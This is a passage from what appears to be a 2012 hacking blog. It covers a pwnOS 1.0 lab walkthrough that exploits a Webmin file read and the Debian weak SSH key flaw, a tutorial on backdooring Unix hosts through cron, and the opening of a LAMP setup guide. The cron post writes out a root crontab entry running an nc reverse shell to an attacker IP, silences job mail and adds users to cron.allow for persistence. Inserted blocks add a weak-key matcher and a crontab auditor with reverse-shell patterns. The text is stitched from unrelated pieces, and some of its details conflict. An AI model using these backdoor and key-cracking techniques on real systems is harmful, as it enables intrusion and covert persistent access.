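  grep -E '^([0-9]{1,3}\.){3}[0-9]{1,3}:[0-9]{1,5}$' \
  | sort -t . -k1,1n -k2,2n -k3,3n -k4,4n \
  | uniq
}

# Exit message: how many proxies made the final list.
report_count() {
  n=$(wc -l < "$1" | tr -d ' ')
  echo "Done: $n unique proxies written to $1"
}

# Constructed stand-in for the decoded output: unsorted, one duplicate,
# one garbage line, two ports on the same host.
printf '%s\n' '203.0.113.25:8080' '10.0.0.5:3128' 'garbage' \
              '10.0.0.5:3128' '2.0.0.1:80' '203.0.113.25:3128' > "$STOR2"
finalize_list < "$STOR2" > "$STOR"
cat "$STOR"
report_count "$STOR"
```

To run it for real, replace the constructed printf with "fetch_pages 1 5 | your_decode_filter > "$STOR2"". The EXIT trap means the temp files go away whether the script finishes, fails or is interrupted, which is the point of moving away from fixed names like o.txt.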
For the super lazy, the full script source for this writeup can be found here: <a href="http://pastebin.com/Q4cbNr2q">http://pastebin.com/Q4cbNr2q</a><br /><br />You can take this logic and apply it to other sites, which in most cases will probably be easier, although some may be trickier (handling redirects, JS decoding, more logic challenges to pull data, etc). Perhaps you can mod this a step further to build in a proxy tester of some kind? Hopefully you can now build your own and be on your way to making this and even cooler scripts with a little bash magic!<br /><b><br />Until next time, enjoy!</b><br /><br />
<br />
PS - I wasn't really prepared to provide a full bash tutorial or any real in-depth explanation of things, so for that I am sorry. The real goal was to share the technique and methods I used so those who want to will be able to follow suit and be on their way to scraping the net with simple bash scripts. Patience and hard work go a long way!<br />
<br />
Here are some helpful links and references for anyone interested in learning more about Bash or any tools used in this example:<br /><b>Bash Scripting Guide: </b><a href="http://tldp.org/LDP/abs/html/index.html">http://tldp.org/LDP/abs/html/index.html</a><br /><b>Bash Arrays:</b> <a href="http://wiki.bash-hackers.org/syntax/arrays">http://wiki.bash-hackers.org/syntax/arrays</a><br /><b>Bash Conditions:</b> <a href="http://www.linuxtutorialblog.com/post/tutorial-conditions-in-bash-scripting-if-statements">http://www.linuxtutorialblog.com/post/tutorial-conditions-in-bash-scripting-if-statements</a><br /><b>Awk & Sed Examples:</b> <a href="http://www.osnews.com/story/21004/Awk_and_Sed_One-Liners_Explained">http://www.osnews.com/story/21004/Awk_and_Sed_One-Liners_Explained</a><br /><b>Awk Guides:</b> <a href="http://www.pement.org/awk/awk1line.txt">http://www.pement.org/awk/awk1line.txt</a><br /><b>Sed Guides: </b><a href="http://www.tty1.net/sed-intro_en.html,">http://www.tty1.net/sed-intro_en.html,</a> <a href="http://sed.sourceforge.net/sed1line.txt">http://sed.sourceforge.net/sed1line.txt</a><br />
<b>Linux Docs: </b><a href="http://linux.die.net/">http://linux.die.net/</a><br /><b>Helpful Search:</b> <a href="http://www.computerhope.com/">http://www.computerhope.com/</a><br /><br />PPS - If you want to speed things up a bit (for this script and others) you can look into jazzing things up with the GNU Parallel tool (<a href="http://www.gnu.org/software/parallel/">http://www.gnu.org/software/parallel/</a>), which is an easy add-in once you know what you're doing and makes managing threads and background processes much easier than the usual grab-the-PID-and-kill method of thread maintenance ;)<br /><br /><b>Video Bonus:</b> Advanced parallel version I wrote for myself and close friends: <br />
<div class="separator" style="clear: both; text-align: center;">
<object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://2.gvt0.com/vi/iXCeR_XsP6o/0.jpg"><param name="movie" value="http://www.youtube.com/v/iXCeR_XsP6o&fs=1&source=uds" /><param name="bgcolor" value="#FFFFFF" /><param name="allowFullScreen" value="true" /><embed width="320" height="266" src="http://www.youtube.com/v/iXCeR_XsP6o&fs=1&source=uds" type="application/x-shockwave-flash" allowfullscreen="true"></embed></object></div>
<br /><b>Exploiting CVE-2008-0166: Debian Weak Key Generation Vulnerability & Webmin on pwnOS 1.0</b> (HR, 2012-08-03)<br /><br />Today I will walk through my fun with pwnOS 1.0 and focus on exploiting a local file disclosure in Webmin and then ultimately gaining shell access through exploitation of CVE-2008-0166, the Debian weak key generation vulnerability. I will do my best to explain things as they occurred, the how and the why, and you can watch a video at the end if anything remains unclear. We start by first finding the box with the typical nmap scan.<br />
<b><br /></b><br />
<b>COMMAND: </b>nmap -v -sS -A -PN <IP><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/XbRpL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/XbRpL.png" width="398" /></a></div>
<br />
I initially investigated the web presence to see what was going on there. It seems to just poke some fun at the attacker; however I did find an LFI vuln in the main page, but was only able to read a few files with it, nothing major though. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/tIKJY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="351" src="http://i.imgur.com/tIKJY.png" width="400" /></a></div>
<br />
Now since I couldn't exploit the LFI vuln in any worthwhile way I continued on and turned my attention to the HTTP service running on port 10000. This of course turned out to be a running instance of Webmin, for which this is the default port. We don't get any real version info except from the banner, which indicates it is likely an early release. A quick check finds <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392">CVE-2006-3392</a>, which, combined with the approach used for the earlier <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3274">CVE-2006-3274</a>, allows unauthenticated disclosure of arbitrary local files on Webmin versions before 1.290 (Usermin is affected as well). I reviewed an existing PHP script found in Exploit-DB but since I don't like PHP much I decided to write my own script in bash. You can find the source to my script here: <a href="https://pastee.org/ymv9m">https://pastee.org/ymv9m</a>. You just point it at the target server, indicate the port the Webmin/Usermin service is running on, and tell it what file you want. Since Webmin typically runs as root we can read pretty much any file on the server. Using my script I was able to snatch /etc/passwd, /etc/shadow, and a few /home/$user/.ssh/authorized_keys files with this vulnerability.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/OG8lA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/OG8lA.png" width="315" /></a></div>
<br />
<br />
You could stop here and direct all attention to cracking the Unix password hashes (DES-based crypt) from the shadow file, but I decided to investigate further to see if there were any other ways to get a shell first...<br />
<br />
Nessus to the rescue:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/manDd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="352" src="http://i.imgur.com/manDd.png" width="400" /></a></div>
<br />
We find the target server has a critical vulnerability identified, marked as Debian Weak Key Generation Vulnerability (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166">CVE-2008-0166</a>), which indicates a remote shell is possible. I looked it up and found it was an interesting vulnerability indeed. If you want the full writeup and details you can check out HD Moore's writeup here: <a href="http://digitaloffense.net/tools/debian-openssl/">http://digitaloffense.net/tools/debian-openssl/</a>. Essentially a change to Debian's OpenSSL package crippled the random number generator so that its output was not so random: the process ID was left as effectively the only input to the seed. The problem is that PIDs on Linux are limited to 32,768 possibilities by default, so for a given architecture, key type and key size the set of keys that could ever be generated is severely limited. HD Moore figured out we could pre-generate the key for every PID and brute-force a weakly generated key to find the matching pair, allowing connection over SSH or decryption of SSL-encrypted data. You can read the article to find out how to generate your own keys, and it links to a few sets available for download. There are several scripts in the exploit databases, in several languages, which do the job of finding the right pair; my favourite after testing several was the Warcat Team's python script, as it had the best results without a drastic compromise on timing. Essentially they all iterate through the possible key files using threaded SSH connection attempts until one pops, indicating a match has been found. You may need to alter the script to insert some delays if you have a sensitive target or a lockout policy in place (you could also tweak it to rotate to a different user account after x attempts). You can then turn around and use the found key to connect or to decrypt, depending on whether you are attacking SSH or SSL. This is what I would call the ONLINE approach, and it is not light on the target's logs: thousands of SSH authentication attempts against one account are hard to miss. 
Alternatively, if you already have one public key (the authorized_keys files pulled through Webmin above are exactly that) you can use the pre-generated keys in an OFFLINE manner to find the matching private key without sending anything to the target server. Once you find the match you can again turn around and connect or decrypt based on your situation.<br />
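The OFFLINE match as a short added example (not the Warcat script or any of the post's tooling). It assumes a directory of pre-generated pairs laid out as NAME plus NAME.pub, indexes them by the base64 key blob, and looks up every entry of a harvested authorized_keys file; the key set, the blobs and the authorized_keys content below are all constructed stand-ins rather than real weak keys, so the matching logic is what is demonstrated.<br />

```bash
#!/usr/bin/env bash
# Added example, not the post's tooling: the OFFLINE approach. Given a
# directory of pre-generated weak key pairs and an authorized_keys file
# harvested through the Webmin file read, report which entries are weak
# and which private key in the set opens them. The key set layout (NAME
# and NAME.pub side by side) and every key blob here are constructed for
# the example; they are not real keys.

set -u

WORK=$(mktemp -d "${TMPDIR:-/tmp}/weakkeys.XXXXXX")
trap 'rm -rf "$WORK"' EXIT
mkdir "$WORK/keys"

# Constructed stand-in for a pre-generated key set (fake blobs).
printf 'ssh-rsa AAAAB3FAKEKEY0001 pid-1234\n' > "$WORK/keys/rsa-1024-1234.pub"
printf 'FAKE PRIVATE KEY 0001\n'              > "$WORK/keys/rsa-1024-1234"
printf 'ssh-rsa AAAAB3FAKEKEY0002 pid-4242\n' > "$WORK/keys/rsa-1024-4242.pub"
printf 'FAKE PRIVATE KEY 0002\n'              > "$WORK/keys/rsa-1024-4242"
printf 'ssh-dss AAAAB3FAKEKEY0003 pid-99\n'   > "$WORK/keys/dsa-1024-99.pub"
printf 'FAKE PRIVATE KEY 0003\n'              > "$WORK/keys/dsa-1024-99"

# Constructed authorized_keys: a comment line, an entry with a leading
# options field, a plain entry, and a key that is not in the weak set.
{
  printf '# keys for admin\n'
  printf 'from="10.0.0.0/8",no-pty ssh-rsa AAAAB3FAKEKEY0002 admin@pwnos\n'
  printf 'ssh-dss AAAAB3FAKEKEY0003 backup@pwnos\n'
  printf 'ssh-rsa AAAAB3STRONGKEY0009 someone@else\n'
} > "$WORK/authorized_keys"

# match_weak_keys KEYSET_DIR AUTHORIZED_KEYS
# Prints "PRIVATE_KEY_PATH  comment" for every authorized_keys entry whose
# public blob is in the set; an entry that is not weak prints nothing.
match_weak_keys() {
  keyset=$1; authkeys=$2
  awk '
    # pass 1: every *.pub in the set maps blob -> private key path
    FILENAME ~ /\.pub$/ {
      for (i = 1; i <= NF; i++) if ($i ~ /^AAAA/) {
        p = FILENAME; sub(/\.pub$/, "", p); priv[$i] = p; break
      }
      next
    }
    # pass 2: authorized_keys. The blob is not always field 2, since an
    # entry may start with an options field, so locate it by its prefix.
    /^#/ || NF == 0 { next }
    {
      for (i = 1; i <= NF; i++) if ($i ~ /^AAAA/) {
        if ($i in priv) print priv[$i] "  " (i < NF ? $NF : "(no comment)")
        break
      }
    }
  ' "$keyset"/*.pub "$authkeys"
}

match_weak_keys "$WORK/keys" "$WORK/authorized_keys"
```

Every SSH public-key blob starts with "AAAA" (the base64 of the length prefix of the key type string), which is why the lookup keys on that prefix instead of a fixed field position. With a real set the index is large, so build it once and keep it; the second pass is then a plain lookup per harvested key and nothing touches the target.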
<br />
Quick run through of abusing this against SSH to pop shell:<br />
Using the keys you made or downloaded (see the link referenced above) and the Warcat script (Exploit-DB), we simply point the script at our keys, the target server and the port SSH is running on, and give it a valid username for an SSH account on the server (the authorized_keys files grabbed earlier tell us which accounts use keys).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/lwiLG.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://i.imgur.com/lwiLG.png" width="400" /></a></div>
<br />
<br />
<br />
It will then launch the bruteforce attack until it finds the matching key. You might need a little patience, but in most cases it should be able to test the full key set in about 20 minutes or less. Once it's found you should get some kind of indicator that the key was found; the Warcat script even gives you the SSH syntax for connecting after finding it:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/wGDgI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://i.imgur.com/wGDgI.png" width="400" /></a></div>
<br />
Once known, we confirm it's working by actually connecting:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Vwg9B.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://i.imgur.com/Vwg9B.png" width="400" /></a></div>
<br />
<br />
We finish things off with the sock_sendpage() or sendsock.c exploit which yields us root privileges for the final win against pwnOS 1.0.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Mossi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://i.imgur.com/Mossi.png" width="400" /></a></div>
<br />
<br />
I understand there are other ways this can be done but thought I would share my experience with you guys. In case anyone is still having trouble grasping everything, or for those who just need the visual walk through, here is a short video on everything: <a href="http://www.youtube.com/watch?v=YudNYxQw240">http://www.youtube.com/watch?v=YudNYxQw240</a><br />
<br />
<b>Until next time, Enjoy!</b><br />
<br />
<br />
<br />
<br /><b>Backdooring Unix System via Cron</b> (HR, 2012-07-09)<br /><br />Once we have access to a compromised system there are a few ways one can go about increasing your foothold on the system for future return access, a.k.a. persistence. This serves as a way back in should the system be updated or patched, rendering the original exploited entry path useless (perhaps you patched it yourself to keep other hackers out :p). Persistence can be achieved in many ways with many methods, but today I will be explaining how we can take advantage of cron jobs to create one more layer of persistence using a scheduled backdoor. I will outline things for you in as easy a way as possible, with a basic explanation of cron as I understand it, and you should be able to tweak things when done to fit your specific need or clever idea for even more evil trickery ;)<br /><br /><b>What is Cron?</b><br />Cron is a Unix utility which executes commands or scripts automatically at a specified time and/or date. It is commonly used by system administrators to run scheduled maintenance tasks, check emails and logs, and such. It is great for handling both simple and complex routines which can be a pain to manage manually (life gets in the way for us all, it just happens, and cron is there to help xD). It can be used to run just about anything really....<br /><br />Good Cron reference I found: <a href="http://en.wikipedia.org/wiki/Cron">Cron Wiki</a><br /><br /><b>How to tell if Cron is already running on your system?</b><br /><br />You can type this at the command prompt:<br /><b>COMMAND:</b> ps aux | grep cron<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/YeULB.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/YeULB.png" width="400" /></a></div>
<br /><br />You should get two lines returned if it's running: one for the crond process found by grep, and a second line which is your grep command catching itself in the ps output. If you only get a single line it is probably the self-grep, and you can now decide if you want to get it running yourself or move on to another method for backdooring this host. Starting crond if it is not already running might not be the smoothest, most ninja move in the book and requires root privileges, but it's up to you to make a judgement call. You can edit the start-up scripts and add "crond" to them and it will start the next time the system reboots. If you are impatient like me and want to get things going right away you can simply type "crond" at the command prompt with root privileges.<br /><br /><b>How to create cron jobs (using cron)?</b><br />Once the crond daemon is running we can add cron jobs to have them performed on the schedule defined when the job is added. You can review the cron documentation for the full ins and outs of editing cron or setting up scheduled jobs, but we will focus on the crontab command, which we can use to view and edit the cron jobs. If you want to first view the existing cron jobs you can simply type:<br />
<br />
<b>COMMAND:</b> crontab -l<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/XmXYx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/XmXYx.png" width="400" /></a></div>
<br />
<br />If you are root you can view/switch/alter any user's crontab by using the -u argument followed by the username.<br />
<br />
<b>COMMAND: </b>crontab -u dumbadmin -l<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/N23jB.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/N23jB.png" width="400" /></a></div>
<br />
<br />
<br />We use the "-e" argument to enter edit mode. In this mode we will use the built-in nano text editor to edit the cron jobs file. If you try to edit the file in the spool directory directly it won't save properly and may be lost, so use the -e option to ensure it is properly edited and saved, as the active config resides in memory, not in the file. If you want to remove all entries you can use the "-r" argument, which will clear the crontab.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/hctEt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/hctEt.png" width="400" /></a></div>
<br />
<br />
When editing you need to be familiar with cron formatting or you will not have any luck getting things to run right or at the right time. You have the ability to define the SHELL variable, PATH, and other variables as you would in a normal bash script. One important one is the MAIL= or MAILTO= variable, which establishes the email address where job output will be sent once the job completes. You can set it to NULL by using a MAIL="" entry so that nothing is sent anywhere (useful for persistence). Once you have defined any needed variables you can then define your command or script to run and when. There are normally seven fields in a crontab job entry, which define the: Minute, Hour, DayOfMonth, Month, DayOfWeek, User, CMD<br /><br />
MINUTE=0-59<br />
<ul>
<li>Defines the minute of the hour to run command</li>
</ul>
HOUR=0-23<br />
<ul>
<li>Uses 24Hr count with 0 being midnight</li>
</ul>
DayOfMonth=0-31<br />
<ul>
<li>Defines the day of the month to run command on</li>
</ul>
MONTH=0-12<br />
<ul>
<li>Use numerical representation of months (1=Jan,12=Dec)</li>
</ul>
DayOfWeek=0-7 or Sun-Sat<br />
<ul>
<li>Defines day of the week to run command and can be numerical or name of day</li>
</ul>
USER=&lt;username&gt;<br />
<ul>
<li>Defines the user who runs the command; not really required when -u &lt;user-name&gt; is used, as the job then runs with that user's privileges</li>
</ul>
CMD=&lt;insert-command-to-run&gt;<br />
<ul>
<li>Defines the command or script to run. This can contain spaces and multiple words to allow some flexibility in defining what you want run and how </li>
</ul>
<br />You can leave any field unrestricted by placing an asterisk in place of its value; it serves as an "all" type indicator.<br /><br /><b>What does all this really mean for me (Mr Hacker)?</b><br />It means if you have access to crontab you can create cron jobs which you can use to run your backdoor scripts at predefined intervals. Here is an example, after exploiting a server, of adding a reverse shell which is spawned every 2 minutes with no mail sent after the job completes.<br /><br /><b>COMMAND:</b> crontab -u root -e<br /><br /><b>#ADDS THIS</b><br />MAIL="" # Make sure our entry doesn't get mailed to any default mail values for existing user entries<br />*/30 * * * * nc -e /bin/sh 192.168.1.21 5151 #Spawn reverse shell every 30 minutes to our set IP and PORT :p<br /><br /><b>#SAVES & EXITS</b><br />
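As an added example that is not from the original post, here is a small audit script that parses crontab text using the fields just described and flags what a defender reviewing a host would want to see: job mail silenced via MAIL="" or MAILTO="", commands matching reverse-shell style patterns (the pattern list is constructed and illustrative), schedules that do not parse, and jobs firing every few minutes. The sample crontab is constructed and includes the entry shown above.

```python
import re
from typing import Dict, List

# Constructed indicator list (label, regex); extend with your own.
SUSPICIOUS_PATTERNS = [
    ("netcat-exec", re.compile(r"\bnc(at)?\b.*\s-e\b")),
    ("dev-tcp", re.compile(r"/dev/tcp/")),
    ("download-exec", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
]
FIELD_RANGES = {"minute": (0, 59), "hour": (0, 23), "day_of_month": (1, 31), "month": (1, 12), "day_of_week": (0, 7)}


def expand_field(spec: str, field: str) -> List[int]:
    """Expand a numeric cron field ('*', '*/30', '1,15', '9-17/2', '5/10') into sorted values."""
    lo, hi = FIELD_RANGES[field]
    values = set()
    for part in spec.split(","):
        step = 1
        if "/" in part:
            part, step_s = part.split("/", 1)
            step = int(step_s)
        if part == "*":
            start, end = lo, hi
        elif "-" in part:
            start, end = (int(x) for x in part.split("-", 1))
        else:
            start = int(part)                 # names such as Sun or Jan raise ValueError here
            end = hi if step > 1 else start   # '5/10' means 5, 15, ... up to the field max
        if step < 1 or not (lo <= start <= end <= hi):
            raise ValueError(f"bad {field} field: {spec!r}")
        values.update(range(start, end + 1, step))
    return sorted(values)


def min_interval_minutes(minute: str, hour: str) -> int:
    """Smallest gap between two firings in a day (other fields assumed '*'), wrap past midnight included."""
    fires = sorted(h * 60 + m for h in expand_field(hour, "hour") for m in expand_field(minute, "minute"))
    if len(fires) == 1:
        return 24 * 60
    gaps = [b - a for a, b in zip(fires, fires[1:])]
    return min(gaps + [fires[0] + 24 * 60 - fires[-1]])


def parse_crontab(text: str, system: bool = False) -> Dict[str, list]:
    """Split crontab text into env assignments and jobs; system=True adds the user field of /etc/crontab."""
    env, jobs = [], []
    nfields = 6 if system else 5
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$", line)
        if m:  # simplification: drop a trailing '# comment' and surrounding quotes
            value = m.group(2).split("#", 1)[0].strip().strip("\"'")
            env.append({"line": lineno, "name": m.group(1), "value": value})
            continue
        if line.startswith("@"):  # @reboot, @daily, ...: recorded, not expanded
            jobs.append({"line": lineno, "schedule": None, "user": None,
                         "command": line.partition(" ")[2].strip()})
            continue
        parts = line.split(None, nfields)
        if len(parts) < nfields + 1:
            continue  # malformed entry; cron itself would reject it
        jobs.append({"line": lineno, "schedule": parts[:5],
                     "user": parts[5] if system else None, "command": parts[nfields]})
    return {"env": env, "jobs": jobs}


def audit(text: str, system: bool = False, max_frequency_minutes: int = 5) -> List[Dict[str, object]]:
    """Findings to review: silenced job mail, suspicious commands, bad schedules, very frequent jobs."""
    parsed = parse_crontab(text, system)
    findings = []
    for e in parsed["env"]:
        if e["name"] in ("MAIL", "MAILTO") and e["value"] == "":
            findings.append({"line": e["line"], "reason": "job-output-silenced", "text": e["name"] + '=""'})
    for job in parsed["jobs"]:
        for label, rx in SUSPICIOUS_PATTERNS:
            if rx.search(job["command"]):
                findings.append({"line": job["line"], "reason": label, "text": job["command"]})
        if job["schedule"] is None:
            continue
        try:
            interval = min_interval_minutes(job["schedule"][0], job["schedule"][1])
        except ValueError:
            findings.append({"line": job["line"], "reason": "unparseable-schedule", "text": " ".join(job["schedule"])})
            continue
        if interval <= max_frequency_minutes:
            findings.append({"line": job["line"], "reason": "high-frequency", "text": f"every {interval} min"})
    return findings


# Constructed sample: what `crontab -u root -l` might show with the entry from the post added next to a real backup job.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
MAIL="" # Make sure our entry doesnt get mailed
0 3 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
*/30 * * * * nc -e /bin/sh 192.168.1.21 5151
*/2 * * * * /tmp/.x/update.sh
"""
```

Run `audit(SAMPLE_CRONTAB)` to get the three findings for the sample (silenced mail on line 2, the nc entry on line 4, and the two-minute job on line 5); pass `system=True` when feeding it /etc/crontab or files under /etc/cron.d, which carry the extra user field.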
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/h7tfK.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/h7tfK.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />Now confirm our changes were saved by listing them again:<br /><br />
<b>COMMAND:</b> crontab -u root -l<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/MqkZG.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/MqkZG.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />You should now see the added entry in your crontab list. Open up a local listener and wait for your connection from the compromised server with root privileges.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/9hXjA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="http://i.imgur.com/9hXjA.png" width="400" /></a></div>
<br />
<br />
Now if you get disconnected or want to do some work, just open a listener and wait to catch the next call home. You can play with the timing to do all sorts of stuff; I only used 2min for demo purposes.... <br /><br /><b>A few side notes:</b><br />Administrators will often use built-in system features to restrict cron access; this is typically done using the files /etc/cron.allow and /etc/cron.deny. You can add "ALL" or the specific username to these files if needed (may require root privileges).<br />
<br />
<b>COMMAND:</b> echo dumbAdmin >> /etc/cron.allow<br /><br />If you need results from your cron-run commands, scripts, or what have you, simply use standard Unix redirection syntax (>, >>, 2>&1, etc.) to send the output to the log file of your choice. <br /><br />If you can edit the crontab but you don't have root access you can still use it to spawn a shell, but it will only be served up with the privileges of the user whose crontab was edited or that the job is set to run as. <u>You can also abuse editable scripts launched via cron jobs and the rights they are executed with; on occasion, when conditions are right, this can also result in <b>complete compromise of the system, r00t access! </b></u><b><br /><br />Until next time, Enjoy!</b><br /><br /><br />PS - I am new to trying to learn cron so this is my take on a 1 day crash course I just gave myself. If you have suggestions to improve things please let me know so I can update and improve or add other tricks you care to share....<br /><br /><b>Setting up Linux Apache, MySQL, and PHP (LAMP) Environment</b> (HR, 2012-07-03)
<br />
<div style="margin-bottom: 0in;">
Today I will walk you through setting
up your own local test environment on Ubuntu but the steps outlined
should be applicable or easily transferred over to other Linux
distributions. We will build it in layers and we will start with
apache2 and work our way up from there with each layer essentially
building on the previous. I will try to keep it as simple as
possible, here goes...</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<u><b>APACHE:</b></u></div>
<div style="margin-bottom: 0in;">
In order to install apache we will use
"apt-get". Simply open up a terminal and type the following:
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND:</b> sudo apt-get install
apache2 </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/uP3Mt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/uP3Mt.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
This downloads and installs apache2
with all the needed requirements without all the fuss. We can confirm
it is working by simply pointing our browser at: http://localhost or
http://127.0.0.1:80
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/WHAhV.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="http://i.imgur.com/WHAhV.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
You should see the basic Apache starter
page stating it's working. You can find this file in the "/var/www/"
directory. You can now place files in this folder to be displayed by
your Apache web server. If you need to start|stop|restart the Apache
server, simply issue this command:
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>sudo
/etc/init.d/apache2 start|stop|restart
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<u><b>PHP:</b></u></div>
<div style="margin-bottom: 0in;">
Now we have our server up, BUT if you
place a PHP file (&lt;?php phpinfo(); ?&gt;) in the "/var/www/" directory you will
quickly see it doesn't work as intended (it probably tries to make
you download the file). We now need to add another layer to our
server so it speaks PHP, by installing PHP. We can do this with another
"apt-get" set of commands; here are the steps to install
the latest version of PHP5 and the necessary apache modules to
accompany it:
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND:</b> sudo apt-get install
php5 libapache2-mod-php5
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Ihinb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/Ihinb.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
Now if you go and try your PHP page
you will still find it's not working properly. We need to restart the
Apache server for our changes to be properly incorporated. We use the
command provided above to restart Apache...
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>sudo
/etc/init.d/apache2 restart
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/5PafO.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/5PafO.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
and now when we point our browser to:
http://localhost/file.php we are greeted with the proper greeting we
were expecting.
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Negrp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="http://i.imgur.com/Negrp.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
If you want to find the files for
apache web output just navigate to “/var/www/”</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/TltwW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="270" src="http://i.imgur.com/TltwW.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>NOTE: </b>If for some reason you
don't have a PHP file handy, simply make a file with a .php extension
and place this inside: "&lt;?php echo "&lt;font
color='red'&gt;&lt;b&gt;Hey Fucker it works!&lt;/b&gt;&lt;/font&gt;";
?&gt;" so that it shows a nice message when viewed in the browser
:p
</div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<u><b>MySQL: </b></u>
</div>
<div style="margin-bottom: 0in;">
Now eventually you will need or want a
database to connect to, so I will also include setting up a MySQL
database today as well. We will one more time take advantage of the
simplicity built into "apt-get" and use the following
command to download MySQL Server and all the basics to go with it.
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>sudo apt-get install
mysql-server
</div>
<div class="separator" style="clear: both; text-align: center;">
